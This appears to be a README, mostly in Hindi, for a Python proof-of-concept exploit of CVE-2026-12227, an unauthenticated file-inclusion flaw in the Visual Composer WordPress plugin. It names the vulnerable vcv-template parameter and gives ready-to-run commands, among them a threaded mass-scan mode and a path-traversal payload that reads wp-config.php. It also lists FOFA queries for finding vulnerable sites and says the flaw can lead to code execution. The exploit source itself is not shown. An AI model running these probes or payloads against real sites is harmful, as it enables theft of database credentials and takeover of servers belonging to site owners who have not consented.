CVE-2026-12227 — Visual Composer Website Builder अनधिकृत LFI
CVE-2026-12227 (Wordfence) के लिए Python 3 PoC: Visual Composer Website Builder (wordpress.org पर visualcomposer) में vcv-template क्वेरी पैरामीटर के माध्यम से Local File Inclusion।
| |
|---|
| Platform | WordPress plugin |
| Component | Visual Composer Website Builder |
| Affected | ≤ 45.16.0 |
| Fixed in | > 45.16.0 (WP Trac 3619572) — नवीनतम स्थिर संस्करण (जैसे 45.16.3+) का उपयोग करें |
| CVSS | 9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| Auth | Unauthenticated |
| CWE | CWE-98 |
| Not | WPBakery (js_composer) या SAP NetWeaver Visual Composer |
Summary
कमजोर संस्करणों पर, सार्वजनिक पृष्ठ लोड WordPress template_include हैंडलिंग के दौरान PageTemplatesController के अंदर हमलावर-नियंत्रित vcv-template (साथ में vcv-template-type) का पालन करते हैं। यह डिस्क पर हमलावर-चयनित फ़ाइलों को शामिल कर सकता है; PHP फ़ाइलें निष्पादित हो सकती हैं (RCE)। Wordfence कुछ सेटअपों में अपलोड की गई "सुरक्षित" एक्सटेंशनों के साथ चेन का उल्लेख करता है।
Attack surface
- प्लगइन इंस्टॉल होना और VC से बना फ्रंट-एंड पृष्ठ आवश्यक है (सामान्य परमालिंक)।
- प्रोब क्वेरी पैरामीटर जोड़ता है, जैसे
?vcv-template-type=vc&vcv-template=blank या vcv-template के अंतर्गत LFI पथ।
- संबंधित पैरामीटर:
vcv-template-type, vcv-template-stretched।
Requirements
pip install -r requirements.txt
Python 3.8+।
Usage
# Version + plugin + VC page crawl + template/LFI probes
python poc.py -u https://target.example --mode check
# Known VC landing page
python poc.py -u https://target.example --mode check --page-url /
# Mass scan
python poc.py --list targets.example.txt --mode check --threads 25 --quiet
# Custom include path (authorized testing only)
python poc.py -u https://target.example --mode exploit --page-url / --file ../../../../../../wp-config.php
# JSON for scripting
python poc.py -u https://target.example --mode check --json
Output
| File | Meaning |
|---|
cve_2026_12227_results.jsonl | प्रति-लक्ष्य पूर्ण JSON |
Status values
FOFA hints
body="/wp-content/plugins/visualcomposer/"
body="data-vcv-" && body="wp-content"
Technical notes
- कोड पथ:
visualcomposer/Modules/Editors/Settings/PageTemplatesController.php (getCurrentTemplateLayout, viewPageTemplate)।
- Check param control या LFI markers को
exploitable_candidate मानता है; RCE मानने से पहले स्टेजिंग क्लोन पर पुष्टि करें।
- प्रीमियम TemplateFilter / theme-builder ऐडऑन कुछ साइटों पर पहुंच योग्य पथों को बढ़ा सकते हैं।
Legal
केवल उन सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं या जिनका परीक्षण करने की आपको स्पष्ट अनुमति है।